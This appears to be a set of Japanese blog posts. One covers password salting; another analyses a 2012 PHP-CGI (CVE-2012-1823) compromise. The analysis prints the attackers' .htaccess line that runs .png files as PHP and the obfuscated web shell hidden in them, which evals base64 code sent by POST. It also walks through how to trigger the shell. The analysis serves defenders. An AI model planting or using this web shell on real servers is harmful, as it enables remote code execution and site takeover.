saltなしだと…

1. 辞書攻撃（レインボーテーブル）が容易
2. 同じパスワードだとわかる
   1. 同じシステムの異なるユーザー間で
   2. 異なるシステムのユーザー間で
3. パスワードを変更したかどうかがわかる

みんなに同じsaltを使う

1はある程度は防げる。
ただし、十分に速いコンピュータを使えば、辞書攻撃はかなり容易。

ユーザー毎にsaltを変える（ユーザーIDとかそのハッシュとか）

2.1は防げる。

完全にランダムな値をsaltにする

2.2や3も防げる。

参考

• SHA1でハッシュ化したパスワードは危険になった – yohgaki's blog
• http://neta.ywcafe.net/000123.html
• パスワードを平文で管理するのはダメだ | ブログが続かないわけ
• [PHP]パスワードのハッシュ化にはcrypt が便利 | ブログが続かないわけ
• パスワードの保存に SMD5 (Salted MD5) や SSHA1を使う (MD5 への辞書攻撃とか) - まちゅダイアリー(2007-10-23)

何をされたのか？

これらの事例で行なわれたのはCVE-2012-1823の脆弱性を利用して、2つのファイルを設置のみのようです。

1つ目のファイルは .htaccess で内容は以下の一行のみ。

AddHandler application/x-httpd-php .png

当然.htaccessがすでにある場合は上書きされてしまいます。
「.png」ではなくて「.gif」であることもあるようです。
これにより拡張子がpngのファイルにアクセスがあるとそのファイルがPHPスクリプトとして実行されることになります。

2つ目のファイルは以下のようなPHPスクリプトだけどファイル名は「乱数＋画像の拡張子（.htaccessに書かれたもの）」

<?php ($_=$_POST).($_1='_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

つまり、2つ目の一見画像に見えるファイルにアクセスするとその中に書かれたPHPスクリプトが実行されると言うことです。

このスクリプトで何ができるの？

このPHPスクリプトはちょっとわかりにくく書かれていますが、要は

$_=$_POST;
$_1='_';
$_4=$$_1;
$_4=$_4[$_1];
$_4($$_1));
eval(base64_decode($_4($$_1)));

ということで、さらに $_1='_', $_=$_POST; から $$_1 → ${$_1} → ${'_'} → $_ → $_POST; なので

$_4=$_POST;
$_4=$_4['_'];
$_4($_POST));
eval(base64_decode($_4($_POST)));

結局

$function = $_POST['_'];
$function($_POST);
eval(base64_decode($function($_POST)));

ということです。

これはつまりどういうことなのか。
$function(...); とあるので $function = $_POST['_'] は関数じゃないといけないですね（なので $function という変数名にしました）。$_POSTに二回実行する関数で二回目の実行で文字列を返すようになる関数は何か。

array_shiftもしくはarray_popでしょうか。
つまり以下のような値をPOSTします。

$_POST = array("_" => "array_shift", "code" => "xxxxxxxxxxxxxxxx");

xxxxxxxxxxxxxxxxはbase64_encodeされたPHPスクリプトです。
すると

array_shift($_POST);
eval(base64_decode(array_shift($_POST)));;

となり、xxxxxxxxxxxxxxxxをデコードして得られるPHPスクリプトが実行されるということです。

任意のPHPスクリプトがPOSTで値を渡すことで実行できるようにされているということですね。

これは実際に

$_POST = array("_" => "array_shift", "code" => base64_encode("phpinfo();"););
($_=$_POST).($_1='_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));

とすれば確かめられます。

よくわからないのは、任意のコードを実行できる脆弱性があるのにわざわざその脆弱性を使って任意のコードを実行できる環境を作っているということです。
CGI版PHPの脆弱性はそのうち対策がなされるだろうから脆弱性のあるうちにあちこちに任意のコードを実行できる環境を用意しておこうという意図なのでしょうか？

主に被害の見られたロリポップの対応

• 【重要】PHP5.2及びPHP5.3の脆弱性への緊急対応につきまして - 2012年05月04日 / 新着情報 / お知らせ - レンタルサーバーならロリポップ！
• 【メンテナンス】PHPセキュリティ対策メンテナンスのお知らせ - 2012年05月14日 14時45分 / メンテナンス情報 / お知らせ - レンタルサーバーならロリポップ！

最初の対応がちょっと根本的にわかってないなあという感じ。どうして公式発表と違う対応にしてしまったんだろう。
16日の対応でシェルスクリプトのラッパー経由での実行に切り替わったのだといいね。

余談

この脆弱性についての注意喚起は結構なされていたと思います。

• JVNVU#520827: PHP-CGI の query string の処理に脆弱性
• PHP の脆弱性に関する注意喚起
• http://headlines.yahoo.co.jp/hl?a=20120510-00000001-zdn_ait-sci
• http://headlines.yahoo.co.jp/hl?a=20120511-00000002-scan-secu

facebookの対策がしゃれているというのも話題になっていました。

• facebookにPHP CGIの脆弱性を試してみたら面白い対策がされていた！！ - cakephperの日記(CakePHP, Laravel, PHP)

おまけ

大垣さんはこの脆弱性に言及していないのかなと思ったら少しtweetしてました。

参考

• PHPの関数 mb_convert_kanaによる英数字変換の挙動 :jBlog
• 全角/半角変換 mb_convert_kana() の 不具合？｜php Tips｜php plus MySQL